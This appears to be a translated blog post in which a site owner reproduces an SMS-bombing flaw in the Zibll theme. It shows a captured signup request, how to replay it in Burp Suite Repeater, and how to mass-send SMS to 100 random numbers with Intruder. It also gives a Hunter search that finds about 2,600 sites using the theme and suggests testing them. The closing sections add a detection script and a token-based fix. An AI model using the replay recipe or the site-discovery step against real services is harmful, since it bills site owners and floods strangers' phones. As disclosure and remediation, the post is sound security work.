Notes on the SMS abuse vulnerability on Piggy's site

Ramblings

I woke up in the middle of the night to an SMS alert from Alibaba.

[Image 1]

So has my little site, with only 5-6k daily active users, also been targeted by the underground economy? I remember that SMS registration has a slider captcha.

[Image 2]

Could it be... there's a vulnerability in here?

Reproducing the vulnerability

We open Burp Suite and enable interception; you can see "Intercept is on".

[Image 3]

Open a registration page, enter a phone number and click to get the verification code.

[Image 4]

Then the image slider captcha appears; we slide it, and then capture the packet.

[Image 5]

We can see the payload below; the main parameter is email_phone=, followed by the phone number (the captured body is one line, shown here wrapped across several lines).

name=&email_phone=你的手机号&captch=&captcha_type=email_phone&password2=&action=signup_captcha&slidercaptcha%5Bspliced%5D=true&slidercaptcha%5Btrail%5D%5B%5D=0&slidercaptcha%5Btrail%5D%5B%5D=0&slidercaptcha%5Btrail%5D%5B%5D=0&slidercaptcha%5Btrail%5D%5B%5D=1&slidercaptcha%5Btrail%5D%5B%5D=1&slidercaptcha%5Btrail%5D%5B%5D=1&slidercaptcha%5Btrail%5D%5B%5D=1&slidercaptcha%5Btrail%5D%5B%5D=1&slidercaptcha%5Btrail%5D%5B%5D=1&slidercaptcha%5Btrail%5D%5B%5D=1&slidercaptcha%5Btrail%5D%5B%5D=2&slidercaptcha%5Btrail%5D%5B%5D=2&slidercaptcha%5Btrail%5D%5B%5D=2&slidercaptcha%5Btrail%5D%5B%5D=3&slidercaptcha%5Btrail%5D%5B%5D=3&slidercaptcha%5Btrail%5D%5B%5D=3&slidercaptcha%5Btrail%5D%5B%5D=3&slidercaptcha%5Btrail%5D%5B%5D=3&slidercaptcha%5Btrail%5D%5B%5D=3&slidercaptcha%5Btrail%5D%5B%5D=3&slidercaptcha%5Btrail%5D%5B%5D=3&slidercaptcha%5Btrail%5D%5B%5D=3&slidercaptcha%5Btrail%5D%5B%5D=3&slidercaptcha%5Btrail%5D%5B%5D=3&slidercaptcha%5Btrail%5D%5B%5D=3&slidercaptcha%5Btrail%5D%5B%5D=3&slidercaptcha%5Btrail%5D%5B%5D=3&slidercaptcha%5Btrail%5D%5B%5D=3&slidercaptcha%5Btrail%5D%5B%5D=3&slidercaptcha%5Btrail%5D%5B%5D=3&slidercaptcha%5Btrail%5D%5B%5D=3&slidercaptcha%5Btrail%5D%5B%5D=3&slidercaptcha%5Btrail%5D%5B%5D=3&slidercaptcha%5Btrail%5D%5B%5D=3&slidercaptcha%5Btrail%5D%5B%5D=3&slidercaptcha%5Btrail%5D%5B%5D=3&slidercaptcha%5Btrail%5D%5B%5D=2&slidercaptcha%5Btrail%5D%5B%5D=2&slidercaptcha%5Btrail%5D%5B%5D=2&slidercaptcha%5Btrail%5D%5B%5D=2&slidercaptcha%5Btrail%5D%5B%5D=2&slidercaptcha%5Btrail%5D%5B%5D=2&slidercaptcha%5Btrail%5D%5B%5D=2&slidercaptcha%5Btrail%5D%5B%5D=2&slidercaptcha%5Btrail%5D%5B%5D=2&slidercaptcha%5Btrail%5D%5B%5D=2&slidercaptcha%5Btrail%5D%5B%5D=2&slidercaptcha%5Btrail%5D%5B%5D=2&slidercaptcha%5Btrail%5D%5B%5D=2&slidercaptcha%5Btrail%5D%5B%5D=2&slidercaptcha%5Btrail%5D%5B%5D=2&slidercaptcha%5Btrail%5D%5B%5D=2&slidercaptcha%5Btrail%5D%5B%5D=2&slidercaptcha%5Btrail%5D%5B%5D=2&slidercaptcha%5Btrail%5D%5B%5D=2&slidercaptcha%5Btrail%5D%5B%5D=2&slidercaptcha%5Btrail%5D%5B%5D
=1&slidercaptcha%5Btrail%5D%5B%5D=1&slidercaptcha%5Btrail%5D%5B%5D=1&slidercaptcha%5Btrail%5D%5B%5D=1&slidercaptcha%5Btrail%5D%5B%5D=1&slidercaptcha%5Btrail%5D%5B%5D=1&slidercaptcha%5Btrail%5D%5B%5D=1&slidercaptcha%5Btrail%5D%5B%5D=0&slidercaptcha%5Btrail%5D%5B%5D=0&slidercaptcha%5Btrail%5D%5B%5D=0&slidercaptcha%5Btrail%5D%5B%5D=0&slidercaptcha%5Btrail%5D%5B%5D=0&slidercaptcha%5Btrail%5D%5B%5D=0&slidercaptcha%5Btrail%5D%5B%5D=0&slidercaptcha%5Btrail%5D%5B%5D=-1&slidercaptcha%5Btrail%5D%5B%5D=-1&slidercaptcha%5Btrail%5D%5B%5D=-1&slidercaptcha%5Btrail%5D%5B%5D=-1&slidercaptcha%5Btrail%5D%5B%5D=-1&slidercaptcha%5Btrail%5D%5B%5D=-1&slidercaptcha%5Btrail%5D%5B%5D=-1&slidercaptcha%5Btrail%5D%5B%5D=-1&slidercaptcha%5Btrail%5D%5B%5D=-1&slidercaptcha%5Btrail%5D%5B%5D=-2&slidercaptcha%5Btrail%5D%5B%5D=-2&slidercaptcha%5Btrail%5D%5B%5D=-2&slidercaptcha%5Btrail%5D%5B%5D=-2&slidercaptcha%5Btrail%5D%5B%5D=-2&slidercaptcha%5Btrail%5D%5B%5D=-2&slidercaptcha%5Btrail%5D%5B%5D=-3&slidercaptcha%5Btrail%5D%5B%5D=-3&slidercaptcha%5Btrail%5D%5B%5D=-3&slidercaptcha%5Btrail%5D%5B%5D=-3&slidercaptcha%5Btrail%5D%5B%5D=-4&slidercaptcha%5Btrail%5D%5B%5D=-4&slidercaptcha%5Btrail%5D%5B%5D=-4&slidercaptcha%5Btrail%5D%5B%5D=-4&slidercaptcha%5Btrail%5D%5B%5D=-4&slidercaptcha%5Btrail%5D%5B%5D=-4&slidercaptcha%5Btrail%5D%5B%5D=-4&slidercaptcha%5Btrail%5D%5B%5D=-4&slidercaptcha%5Btrail%5D%5B%5D=-4&slidercaptcha%5Btrail%5D%5B%5D=-4&slidercaptcha%5Btrail%5D%5B%5D=-4&slidercaptcha%5Btrail%5D%5B%5D=-4&slidercaptcha%5Btrail%5D%5B%5D=-4&slidercaptcha%5Btrail%5D%5B%5D=-4&slidercaptcha%5Btrail%5D%5B%5D=-4&slidercaptcha%5Btrail%5D%5B%5D=-4&slidercaptcha%5Btrail%5D%5B%5D=-4&slidercaptcha%5Btrail%5D%5B%5D=-4&slidercaptcha%5Btrail%5D%5B%5D=0&slidercaptcha%5Btrail%5D%5B%5D=0&slidercaptcha%5Btrail%5D%5B%5D=0&slidercaptcha%5Btrail%5D%5B%5D=0&slidercaptcha%5Btrail%5D%5B%5D=0&slidercaptcha%5Btrail%5D%5B%5D=0&slidercaptcha%5Btrail%5D%5B%5D=0&slidercaptcha%5Btrail%5D%5B%5D=0&slidercaptcha%5Btrail%5D%5B%5D=0&slidercaptcha
%5Btrail%5D%5B%5D=0&slidercaptcha%5Btrail%5D%5B%5D=0&slidercaptcha%5Btrail%5D%5B%5D=0&slidercaptcha%5Btrail%5D%5B%5D=0&slidercaptcha%5Btrail%5D%5B%5D=0&slidercaptcha%5Btrail%5D%5B%5D=0&slidercaptcha%5Btrail%5D%5B%5D=0&slidercaptcha%5Btrail%5D%5B%5D=0&slidercaptcha%5Btrail%5D%5B%5D=0&slidercaptcha%5Btrail%5D%5B%5D=0&slidercaptcha%5Btrail%5D%5B%5D=0&slidercaptcha%5Btrail%5D%5B%5D=0&slidercaptcha%5Btrail%5D%5B%5D=0&slidercaptcha%5Btrail%5D%5B%5D=-1&slidercaptcha%5Btrail%5D%5B%5D=-1&slidercaptcha%5Btrail%5D%5B%5D=-1&slidercaptcha%5Btrail%5D%5B%5D=-2&slidercaptcha%5Btrail%5D%5B%5D=-2&slidercaptcha%5Btrail%5D%5B%5D=-2&slidercaptcha%5Btrail%5D%5B%5D=-2&slidercaptcha%5Btrail%5D%5B%5D=-2&slidercaptcha%5Btrail%5D%5B%5D=-2&slidercaptcha%5Btrail%5D%5B%5D=-2&slidercaptcha%5Btrail%5D%5B%5D=-2&slidercaptcha%5Btrail%5D%5B%5D=-2&slidercaptcha%5Btrail%5D%5B%5D=-2&slidercaptcha%5Btrail%5D%5B%5D=-2&slidercaptcha%5Btrail%5D%5B%5D=-2&slidercaptcha%5Btrail%5D%5B%5D=-2&slidercaptcha%5Btrail%5D%5B%5D=-2&slidercaptcha%5Btrail%5D%5B%5D=-2&slidercaptcha%5Btrail%5D%5B%5D=-2&slidercaptcha%5Btrail%5D%5B%5D=-2&slidercaptcha%5Btrail%5D%5B%5D=-2&slidercaptcha%5Btrail%5D%5B%5D=-2&slidercaptcha%5Btrail%5D%5B%5D=-2&slidercaptcha%5Btrail%5D%5B%5D=-2&slidercaptcha%5Btrail%5D%5B%5D=-2&slidercaptcha%5Btrail%5D%5B%5D=-2&slidercaptcha%5Btrail%5D%5B%5D=-2&slidercaptcha%5Btrail%5D%5B%5D=-2&slidercaptcha%5Btrail%5D%5B%5D=-2&slidercaptcha%5Btrail%5D%5B%5D=-2&slidercaptcha%5Btrail%5D%5B%5D=-2&slidercaptcha%5Btrail%5D%5B%5D=-2&slidercaptcha%5Btrail%5D%5B%5D=-2&slidercaptcha%5Btrail%5D%5B%5D=-2&slidercaptcha%5Btrail%5D%5B%5D=-2&slidercaptcha%5Btrail%5D%5B%5D=-2&slidercaptcha%5Btrail%5D%5B%5D=-2&slidercaptcha%5Btrail%5D%5B%5D=-2&slidercaptcha%5Btrail%5D%5B%5D=-3&slidercaptcha%5Btrail%5D%5B%5D=-3&slidercaptcha%5Btrail%5D%5B%5D=-3&slidercaptcha%5Btrail%5D%5B%5D=-3&slidercaptcha%5Btrail%5D%5B%5D=-3&slidercaptcha%5Btrail%5D%5B%5D=-3&slidercaptcha%5Btrail%5D%5B%5D=-3&slidercaptcha%5Btrail%5D%5B%5D=-3&slidercaptcha%5Btrai
l%5D%5B%5D=-4&slidercaptcha%5Btrail%5D%5B%5D=-4&slidercaptcha%5Btrail%5D%5B%5D=-4&slidercaptcha%5Btrail%5D%5B%5D=-5&slidercaptcha%5Btrail%5D%5B%5D=-5&slidercaptcha%5Btrail%5D%5B%5D=-5&slidercaptcha%5Btrail%5D%5B%5D=-5&slidercaptcha%5Btrail%5D%5B%5D=-6&slidercaptcha%5Btrail%5D%5B%5D=-6&slidercaptcha%5Btrail%5D%5B%5D=-6&slidercaptcha%5Btrail%5D%5B%5D=-6&slidercaptcha%5Btrail%5D%5B%5D=-7&slidercaptcha%5Btrail%5D%5B%5D=-7&slidercaptcha%5Btrail%5D%5B%5D=-7&slidercaptcha%5Btrail%5D%5B%5D=-7&slidercaptcha%5Btrail%5D%5B%5D=-7&slidercaptcha%5Btrail%5D%5B%5D=-7&slidercaptcha%5Btrail%5D%5B%5D=-8&slidercaptcha%5Btrail%5D%5B%5D=-8&slidercaptcha%5Btrail%5D%5B%5D=-8&slidercaptcha%5Btrail%5D%5B%5D=-8&slidercaptcha%5Btrail%5D%5B%5D=-8&slidercaptcha%5Btrail%5D%5B%5D=0&slidercaptcha%5Btrail%5D%5B%5D=0&slidercaptcha%5Btrail%5D%5B%5D=0&slidercaptcha%5Btrail%5D%5B%5D=0&slidercaptcha%5Btrail%5D%5B%5D=0&slidercaptcha%5Btrail%5D%5B%5D=0&slidercaptcha%5Btrail%5D%5B%5D=0&slidercaptcha%5Btrail%5D%5B%5D=0&slidercaptcha%5Btrail%5D%5B%5D=0&slidercaptcha%5Btrail%5D%5B%5D=0&slidercaptcha%5Btrail%5D%5B%5D=0&slidercaptcha%5Btrail%5D%5B%5D=0&slidercaptcha%5Btrail%5D%5B%5D=0&slidercaptcha%5Btrail%5D%5B%5D=0&slidercaptcha%5Btrail%5D%5B%5D=0&slidercaptcha%5Btrail%5D%5B%5D=0&slidercaptcha%5Btrail%5D%5B%5D=0&slidercaptcha%5Btrail%5D%5B%5D=0&slidercaptcha%5Btrail%5D%5B%5D=0&slidercaptcha%5Btrail%5D%5B%5D=0&slidercaptcha%5Btrail%5D%5B%5D=0&slidercaptcha%5Btrail%5D%5B%5D=0&slidercaptcha%5Btrail%5D%5B%5D=0&slidercaptcha%5Btrail%5D%5B%5D=0&slidercaptcha%5Btrail%5D%5B%5D=0&slidercaptcha%5Btrail%5D%5B%5D=0&slidercaptcha%5Btrail%5D%5B%5D=0&slidercaptcha%5Btrail%5D%5B%5D=0&slidercaptcha%5Btrail%5D%5B%5D=0&slidercaptcha%5Btrail%5D%5B%5D=0&slidercaptcha%5Btrail%5D%5B%5D=0&slidercaptcha%5Btrail%5D%5B%5D=0&slidercaptcha%5Btrail%5D%5B%5D=0&slidercaptcha%5Btrail%5D%5B%5D=0&slidercaptcha%5Btrail%5D%5B%5D=0&slidercaptcha%5Btrail%5D%5B%5D=0&slidercaptcha%5Btrail%5D%5B%5D=0&slidercaptcha%5Btrail%5D%5B%5D=0&slidercaptcha%5Btr
ail%5D%5B%5D=0&slidercaptcha%5Btrail%5D%5B%5D=-1&slidercaptcha%5Btrail%5D%5B%5D=-1&slidercaptcha%5Btrail%5D%5B%5D=-1&slidercaptcha%5Btrail%5D%5B%5D=-1&slidercaptcha%5Btrail%5D%5B%5D=-1&slidercaptcha%5Btrail%5D%5B%5D=-1&slidercaptcha%5Btrail%5D%5B%5D=-1&slidercaptcha%5Btrail%5D%5B%5D=-1&slidercaptcha%5Btrail%5D%5B%5D=-1&slidercaptcha%5Btrail%5D%5B%5D=-1&slidercaptcha%5Btrail%5D%5B%5D=-1&slidercaptcha%5Btrail%5D%5B%5D=-1&slidercaptcha%5Btrail%5D%5B%5D=-1&slidercaptcha%5Btrail%5D%5B%5D=-1&slidercaptcha%5Btrail%5D%5B%5D=-1&slidercaptcha%5Btrail%5D%5B%5D=-1&slidercaptcha%5Btrail%5D%5B%5D=-1&slidercaptcha%5Btrail%5D%5B%5D=-1&slidercaptcha%5Btrail%5D%5B%5D=-1&slidercaptcha%5Btrail%5D%5B%5D=-1&slidercaptcha%5Btrail%5D%5B%5D=-1&slidercaptcha%5Btrail%5D%5B%5D=-1&slidercaptcha%5Btrail%5D%5B%5D=-1&slidercaptcha%5Btrail%5D%5B%5D=-1&slidercaptcha%5Btrail%5D%5B%5D=-1&slidercaptcha%5Btrail%5D%5B%5D=-1&slidercaptcha%5Btrail%5D%5B%5D=-1&slidercaptcha%5Btrail%5D%5B%5D=-1&slidercaptcha%5Btrail%5D%5B%5D=-1&slidercaptcha%5Btrail%5D%5B%5D=-1&slidercaptcha%5Btrail%5D%5B%5D=-1&slidercaptcha%5Btrail%5D%5B%5D=-1&slidercaptcha%5Btrail%5D%5B%5D=-1&slidercaptcha%5Btrail%5D%5B%5D=-1&slidercaptcha%5Btrail%5D%5B%5D=-1&slidercaptcha%5Btrail%5D%5B%5D=-1&slidercaptcha%5Btrail%5D%5B%5D=-1&slidercaptcha%5Bverified%5D=true

So let's test whether this captcha can be reused: right-click and choose Send to Repeater.

[Image 6]

Then see whether the number can be changed and the packet resent; I changed it to another phone number and clicked Send.

[Image 7]

It was actually sent successfully.

[Image 8]

Then I checked my phone, and it had indeed arrived.

[Image 9]

So how do the people in the black-market business turn this vulnerability of ours into SMS bombing?

They have lots of proxy pools; by hammering the endpoint we just saw, they accomplish the so-called SMS bombing……

Here we'll also briefly explain: the same thing can be achieved indirectly through Burp Suite's brute-force mode.

Send the packet we just captured to the Intruder module by clicking Send to Intruder.

[Image 10]

First click Clear to remove the useless variables.

[Image 11]

Then mark the phone number as the variable by clicking Add $; it wraps your phone number with $ on both sides.

[Image 12]

Then, under Payloads, import arbitrary phone numbers; you can generate some random phone numbers yourself.

We generated 100 at random.

[Image 13]

Then click Load to import them.

[Image 14]

Then click Start attack, and the SMS messages get fired off like crazy; at four fen per message, Piggy wept on the spot.

[Image 15]

And then you watch the messages get blasted out one after another……

[Image 16]
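The proxy-pool abuse described above, and the Intruder run that imitates it, leave a recognisable trace in the SMS endpoint's own logs: many sends per minute, spread over many source addresses so that a per-IP limit never fires, and the same slider trail replayed against several different numbers. The script below is an added example (not code from the post or the Zibll theme) that runs these two checks over a constructed log. It assumes a log format of "timestamp, client IP, email_phone, fingerprint of the slidercaptcha[trail] array"; the threshold of 20 sends per minute is a placeholder to be tuned to real traffic.

```python
from collections import defaultdict
from datetime import datetime

# Assumed log format (constructed for this example):
#   "<ISO timestamp> <client IP> <email_phone> <fingerprint of the slider trail>"
MAX_SENDS_PER_MINUTE = 20  # placeholder threshold; tune to the site's real traffic


def _normal_minute():
    # Constructed: three ordinary sign-ups in one minute, distinct trails.
    return [
        "2024-05-01T03:10:05 203.0.113.10 13800000101 fp-a",
        "2024-05-01T03:10:41 203.0.113.10 13800000102 fp-b",
        "2024-05-01T03:10:52 198.51.100.7 13800000103 fp-c",
    ]


def _burst_minute():
    # Constructed: 25 sends inside one minute, each from a different address
    # (proxy pool); the first three replay one slider trail with different numbers.
    lines = []
    for i in range(25):
        fp = "fp-replayed" if i < 3 else f"fp-{i}"
        lines.append(f"2024-05-01T03:12:{i:02d} 198.51.100.{100 + i} 1380000{i:04d} {fp}")
    return lines


LOG_LINES = _normal_minute() + _burst_minute()


def parse_line(line):
    ts, ip, phone, fp = line.split()
    return datetime.fromisoformat(ts), ip, phone, fp


def minute_key(ts):
    # Bucket by wall-clock minute without converting to epoch seconds.
    return ts.replace(second=0, microsecond=0).isoformat()


def analyse(lines):
    events = [parse_line(line) for line in lines if line.strip()]
    alerts = []

    # Check 1: captcha replay. One solved slider should serve exactly one send,
    # so a trail fingerprint seen with more than one phone number is a replay.
    phones_by_fp = defaultdict(set)
    for _, _, phone, fp in events:
        phones_by_fp[fp].add(phone)
    for fp, phones in sorted(phones_by_fp.items()):
        if len(phones) > 1:
            alerts.append(("captcha_replay", fp, len(phones)))

    # Check 2: volume per minute, reported together with the distinct-IP count.
    # When that count is close to the send count, the traffic came through a
    # proxy pool and a per-IP limit alone would never have triggered.
    ips_by_minute = defaultdict(list)
    for ts, ip, _, _ in events:
        ips_by_minute[minute_key(ts)].append(ip)
    for minute, ips in sorted(ips_by_minute.items()):
        if len(ips) > MAX_SENDS_PER_MINUTE:
            alerts.append(("sms_burst", minute, len(ips), len(set(ips))))

    return alerts


if __name__ == "__main__":
    for alert in analyse(LOG_LINES):
        print(alert)
```

The burst alert's last two fields are the point: 25 sends from 25 distinct addresses is exactly the pattern that defeats IP-based throttling, while the replay alert is the direct signature of the Repeater test shown earlier.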

Field notes

Because Piggy's site uses the Zibll (子比) theme, many fellow webmasters have also said it is really painful.

[Image 17]

Look at the one in the video; it's pretty bad.

How to find other webmasters with the same endpoint

We can refer to the earlier article.

Here we use Qi An Xin's Hunter platform; first get the site icon.

[Image 18]

Then upload it.

[Image 19]

Click OK and you can search.

[Image 20]

Hunter only turned up 5 assets here.

[Image 21]

Looks like the icon isn't much use; let's switch to another search method:

web.body="子比"

[Image 22]

This one finds a lot more; you can see over 2,600 assets.

[Image 23]

Then you can go and test whether the sites in there have the same vulnerability as mine.

How to fix the vulnerability

For the fix, we recommend token-based verification: the server generates a token, and every request to the SMS endpoint must pass token validation; if the token is wrong, no SMS is sent! Simply checking the IP is an almost useless strategy!
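The following is an added example (not the Zibll theme's or the author's code) showing the two sides of this fix. vulnerable_send_sms mirrors the behaviour reproduced above: the server believes the client-supplied slidercaptcha[verified]=true, so the same body resent with a different email_phone still triggers an SMS. SmsTokenGuard is the token scheme the post recommends: after the server's own slider check passes, it issues a random token bound to one phone number, and the SMS endpoint only sends when that exact token is presented for that exact number, once, before it expires. The 120-second lifetime, the slider_ok flag standing in for the server-side slider check, and the shortened captured body are assumptions made for the example.

```python
import secrets
import time
from urllib.parse import parse_qs

TOKEN_TTL_SECONDS = 120  # assumption: a solved slider is good for two minutes

# Constructed, shortened version of the captured request body (the long
# slidercaptcha[trail] array is omitted); the number is a placeholder.
CAPTURED_BODY = (
    "name=&email_phone=13800000000&captch=&captcha_type=email_phone"
    "&action=signup_captcha&slidercaptcha%5Bspliced%5D=true"
    "&slidercaptcha%5Bverified%5D=true"
)


def vulnerable_send_sms(body: str) -> bool:
    """The flaw the post reproduces: the server trusts the client's own
    slidercaptcha[verified]=true flag and sends to whatever email_phone it
    finds, so a replayed body with a swapped number still goes through."""
    form = parse_qs(body)  # decodes slidercaptcha%5Bverified%5D -> slidercaptcha[verified]
    verified = form.get("slidercaptcha[verified]", [""])[0] == "true"
    phone = form.get("email_phone", [""])[0]
    return verified and phone != ""


class SmsTokenGuard:
    """Hardened flow: server-side slider check, then a random single-use token
    bound to one phone number; the SMS endpoint consumes the token."""

    def __init__(self, now=time.time):
        self._now = now       # injectable clock so expiry can be tested
        self._issued = {}     # token -> (phone, expires_at)

    def issue_token(self, phone: str, slider_ok: bool):
        # slider_ok is the outcome of the server's own slider verification
        # (assumed to exist); the client's verified flag is never consulted.
        if not slider_ok:
            return None
        token = secrets.token_urlsafe(24)
        self._issued[token] = (phone, self._now() + TOKEN_TTL_SECONDS)
        return token

    def request_sms(self, phone: str, token: str):
        # pop() makes the token single-use even when the request is rejected,
        # so a failed replay cannot be retried with the original number.
        entry = self._issued.pop(token, None)
        if entry is None:
            return False, "unknown or already used token"
        bound_phone, expires_at = entry
        if self._now() > expires_at:
            return False, "token expired"
        if bound_phone != phone:
            return False, "token bound to a different number"
        return True, "sms queued"


if __name__ == "__main__":
    replayed = CAPTURED_BODY.replace("13800000000", "13900000000")
    print("vulnerable, replay with new number:", vulnerable_send_sms(replayed))
    guard = SmsTokenGuard()
    tok = guard.issue_token("13800000000", slider_ok=True)
    print("hardened, wrong number:", guard.request_sms("13900000000", tok))
    print("hardened, token already burned:", guard.request_sms("13800000000", tok))
```

Because the token is bound to the phone number and stored only server-side, the Repeater trick from earlier (same body, new number) and the Intruder run (same body, 100 numbers) both fail at the first check; the remaining cost of an attack is one genuine slider solve per message.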
